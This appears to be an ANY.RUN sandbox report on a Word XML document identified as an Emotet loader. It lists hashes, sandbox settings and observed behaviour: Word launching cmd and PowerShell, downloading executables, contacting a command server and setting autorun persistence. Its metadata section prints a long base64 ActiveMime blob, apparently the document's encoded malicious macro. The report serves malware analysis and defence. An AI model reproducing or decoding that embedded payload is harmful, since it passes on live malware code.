Malware analysis INV_GHM227626-840.doc Malicious activity

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	INV_GHM227626-840.doc
Full analysis:	https://app.any.run/tasks/e74fc3a0-b15f-4538-900b-de4416a01dd9
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	January 22, 2019, 13:17:49
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	loader trojan emotet feodo
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	146CDE895A85B18514F10BA169FB32FA
SHA1:	28346E57A30B56A58194F4912D9D49A8105889BC
SHA256:	F3C8DC768A6C7FB3FBA4D26563E02131AFFD60FF87E3639CC901508029513B48
SSDEEP:	3072:78XgQ0SORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6Algy5:78QjLkeyKHHlf3bwwc3YxqZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 240 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 180 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 3492)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 3492)
- Runs app for hidden code execution
  - cmd.exe (PID: 3260)
- Application was dropped or rewritten from another process
  - 964.exe (PID: 3868)
  - 964.exe (PID: 2880)
  - wabmetagen.exe (PID: 2684)
  - wabmetagen.exe (PID: 2332)
- Downloads executable files from the Internet
  - powershell.exe (PID: 3188)
- EMOTET was detected
  - wabmetagen.exe (PID: 2332)
- Connects to CnC server
  - wabmetagen.exe (PID: 2332)
- Changes the autorun value in the registry
  - wabmetagen.exe (PID: 2332)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 2664)
  - cmd.exe (PID: 3260)
- Executes PowerShell scripts
  - cmd.exe (PID: 2672)
- Application launched itself
  - cmd.exe (PID: 3260)
- Creates files in the user directory
  - powershell.exe (PID: 3188)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3188)
  - 964.exe (PID: 3868)
- Starts itself from another location
  - 964.exe (PID: 3868)
- Connects to unusual port
  - wabmetagen.exe (PID: 2332)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3492)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3492)
- Dropped object may contain Bitcoin addresses
  - powershell.exe (PID: 3188)
  - 964.exe (PID: 3868)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:597.75pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 214874 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	00670C24
WordDocumentBodySectPRsidRDefault:	00D30BA7
WordDocumentBodySectPRsidR:	00D30BA7
WordDocumentDocPrRsidsRsidVal:	005A24B1
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1
WordDocumentDocPrCompatDontGrowAutofit:	-
WordDocumentDocPrCompatUseAsianBreakRules:	-
WordDocumentDocPrCompatWrapTextWithPunct:	-
WordDocumentDocPrCompatSnapToGridInCell:	-
WordDocumentDocPrCompatBreakWrappedTables:	-
WordDocumentDocPrAlwaysShowPlaceholderTextVal:	off
WordDocumentDocPrIgnoreMixedContentVal:	off
WordDocumentDocPrSaveInvalidXMLVal:	off
WordDocumentDocPrValidateAgainstSchema:	-
WordDocumentDocPrPixelsPerInchVal:	120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile:	-
WordDocumentDocPrOptimizeForBrowser:	-
WordDocumentDocPrCharacterSpacingControlVal:	DontCompress
WordDocumentDocPrPunctuationKerning:	-
WordDocumentDocPrDefaultTabStopVal:	720
WordDocumentDocPrDoNotEmbedSystemFonts:	-
WordDocumentDocPrRemovePersonalInformation:	-
WordDocumentDocPrZoomPercent:	100
WordDocumentDocPrViewVal:	print
WordDocumentShapeDefaultsShapelayoutIdmapData:	1
WordDocumentShapeDefaultsShapelayoutIdmapExt:	edit
WordDocumentShapeDefaultsShapelayoutExt:	edit
WordDocumentShapeDefaultsShapedefaultsSpidmax:	1026
WordDocumentShapeDefaultsShapedefaultsExt:	edit
WordDocumentDocSuppDataBinData:	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 